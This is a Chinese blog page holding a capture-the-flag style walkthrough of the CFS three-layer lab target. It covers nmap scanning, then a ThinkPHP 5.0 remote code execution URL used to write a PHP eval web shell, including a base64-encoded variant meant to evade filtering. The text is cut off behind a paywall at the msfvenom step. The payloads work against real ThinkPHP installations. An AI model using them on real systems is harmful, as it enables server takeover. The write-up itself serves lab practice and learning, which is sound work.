渗透测试——CFS三层靶机渗透

最新推荐文章于 2024-05-11 01:20:09 发布
最新推荐文章于 2024-05-11 01:20:09 发布
阅读量2.1k 收藏 7
点赞数 2
分类专栏: 渗透测试 漏洞复现 文章标签: 渗透测试 安全漏洞
抚琴
本文链接:https://blog.csdn.net/qq_42186263/article/details/113389203
版权

在这里插入图片描述
是样一个逻辑
nmap信息收集:

nmap -T4 -O 192.168.1.107

在这里插入图片描述

http://192.168.1.107/public/

在这里插入图片描述看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞
payload:

http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

在这里插入图片描述
执行成功说明存在此漏洞
写入shell

http://192.168.1.107/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%E2%80%9C%3C?php%20@eval($_POST[%E2%80%98TeamsSix%E2%80%99]);?%3E%E2%80%9D%20%3E%20shell.php

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['123456'])?>' > shell.php

在这里插入图片描述
看看是否写入:

http://192.168.1.107/public/shell.php

在这里插入图片描述
上菜刀连接:
在这里插入图片描述
如果有拦截改成base64

[scode type="yellow"]如果连接失败可能是存在过滤,可用base64进行编码
然后语句改为:echo "PD9waHAgQGV2YWwoJF9QT1NUWycxMjM0NTYnXSk/Pg==" | base64 -d > test1.php 即可

看下靶机一系统信息

uanme -a

在这里插入图片描述

在这里插入图片描述
然后使用msfvenom生成对应的反向shellcode:

msfvenom -p
最低0.47元/天 解锁文章
kerve
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CFS.zip_CFS-GA_cfs
09-21
**CFS加密算法详解** CFS(Chaffing and Winnowing)是一种基于混沌理论的文件加密算法,由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”(添加混淆数据)和“Winnowing”...
CFS三层网络环境靶场实战
PANDA墨森的博客
06-22 2942
一、环境搭建: ①根据作者公开的靶机信息整理 共有三个targets,目标是拿下三台主机权限,且是三层的网络环境,内网网段有192.168.22.0/24和192.168.33.0/24,添加两张仅主机模式网卡,配置如下: ②虚拟机网卡设置 target1(centos)双网卡模拟内外网: 外网:192.168.1.3,桥接模式 内网:192.168.22.128,仅主机模式 target2(ubuntu)双网卡存在两个内网网段: 内网1:1...
CFS三层内网靶场渗透
Cfoxer的博客
10-25 2583
使用搭载了VMnet1网卡的kali模拟攻击者从外网信息收集,得到网站信息,利用网站漏洞夺取外网服务器权限,又将失陷的外网服务器作为跳板机,通过代理的方式访问到了内网服务器,然后通过内网服务器网站的漏洞,再一次夺取权限并建立二次代理以后,到达内网办公环境,最后利用主机所存在的漏洞,获得内网主机权限的渗透流程。发现22网段存在设备2,ip地址为192.168.22.129,并且设备2,开启80端口,配置浏览器代理插件,使用浏览器访问查看。访问成功,设置socks5代理,然后使用蚁剑连接。
2024年最新看完这篇 教你玩转渗透测试靶机vulnhub——HackNos-2(2),2024年最新软件测试中高级岗面试为何越来越难
最新发布
2401_84140734的博客
05-11 412
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
CFS三层内网靶机渗透
Ays.Ie的博客
05-18 1372
CFS三层靶机渗透全过程
CFS三层靶机搭建及其内网渗透
..
07-05 6368
CFS三层靶机搭建及其内网渗透,附靶场环境
CFS三层靶机实验
qq_59201520的博客
03-07 629
关于CFS三层靶机实验步骤的解读和复现
CFS三层靶机内网渗透
AiENG_07的博客
12-05 967
方法二、直接通过正向代理工具neo-regroge建立socks通道,导入流量(无法使用icmp探测存活)上传tunnel文件,建立连接。登录后:重点关注上传(头像、文件、编辑器)、导出(文件、sql语句)、自定义模版(网站结构、默认页面更改),ssrf。查找当前cms的历史漏洞,若无历史漏洞,下下策为找源代码审计,大部分系统不开源故不存在代码审计过程;接下来就可以开始内网渗透了,现在忘掉配置是的网卡信息,IP信息,后台信息等等,开始全真模拟。搭建正向代理,不需要在对方服务器中额外开通端口,利用后端代码。
sched_fair.rar_batch_cfs
09-22
"Sched_fair.rar_batch_cfs" 提到的是完全公平调度器(Completely Fair Scheduler, CFS)中的两类任务调度策略:SCHED_NORMAL 和 SCHED_BATCH。这两个调度类在CFS框架下运行,确保系统资源的公平分配。 1. 完全公平...
linux CFS调度以及load balance.pptx
02-24
Linux CFS 调度和 Load Balance Linux 操作系统中,CFS(Completely Fair Scheduler)是一种调度算法,用于管理系统中的进程调度。下面将详细介绍 CFS 调度和 Load Balance 相关知识点。 一、调度器 Scheduler 在...
CFS调度器(6)-总结.pdf
07-31
经过前面一系列的文章描述,我们已经对CFS调度器有了一定的认识。那么本篇文章就作为一篇总结和思考。我们就回忆一下CFS调度器的那些事。我们就以问题的形式重新回顾一遍CFS调度器设计的原理。现在开始,我们问题...
cfs PPT讲解
07-20
cfs PPT对于加密文件系统做了系统的介绍和理解,挺不错
渗透测试CFS三层靶机内网渗透
LvHLong的博客
02-23 6447
一、环境搭建: 靶机拓扑: 1.添加虚拟网卡: 添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡 VMnet8为NAT模式与外部通信 2.配置网卡: target1网络配置: target2网络配置: target3网络配置: 3.web靶机搭建(宝塔面板启动) 启动命令: /etc/init.d/bt start 重启 /etc/init.d/bt restart 默认端口管理8888 环境搭建完 kali能ping通ta..
【VulnHub靶场】——CFS三层靶机内网渗透实操
热门推荐
Demo不是emo的博客
08-07 1万+
CFS三层靶场实操
[内网渗透]CFS三层靶机渗透
leekos的博客,分享web安全相关知识~
08-12 1000
在MSF中开启监听,与Target2建立连接,这里需要注意,上一次代理使用的reverse_tcp是MSF作为监听,让Target1连到我们,而这次代理使用的bind_tcp是Target2作为监听,我们需要连到Target2,这个逻辑正好是相反的。我们可以设置一个路由,然后把我们的请求通过Target1的vmnet1网段发出,然后重定向转发到vmnet2网段,这样kali的msf就可以与22网段(Target2)互通了。(新开一个终端后,我们需要在这个新开的msf终端上配置一个代理,然后修改。
靶机常见问题汇总1
2301_77132421的博客
04-03 398
方法:a。
CFS三层靶机渗透_Kali版
qq_42383069的博客
03-18 5773
环境搭建 0x01. 环境下载: 【CFS三层靶机环境】百度网盘链接: 链接: https://pan.baidu.com/s/1LJueA-X02K7HZXr8QsOmeg 提取码: dkcp 解压密码:teamssix.com 0x02. 环境搭建: 1)设置虚拟机网卡(新建两个仅主机模式的网卡) VMnet10: 子网IP:192.168.22.0 子网掩码:255.255.255.0 VMnet11: 子网IP:192.168.33.0 子网掩码:255.255.255.0 2)虚
CFS三层靶机安装与配置
ChenD的学习笔记
03-07 774
CFS三层靶机安装与配置,三层靶机,内网渗透靶机,非常详细,这时候就要给它改成静态的。Ubuntu中带了一个账号dora,如果进入图形化页面,则需要dora的密码,所以先一步修改dora的密码。target2为三层靶机中的第二层,需要与第一层(target1)互通,与第三层(target3)互通。target1为三层靶机中的第一层,需要与第二层(target2)互通,与攻击机(Kali互通)HWADDR=00:0c:29:63:e9:a0 #修改它。
cfs内网渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内网渗透,我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的网站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kerve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值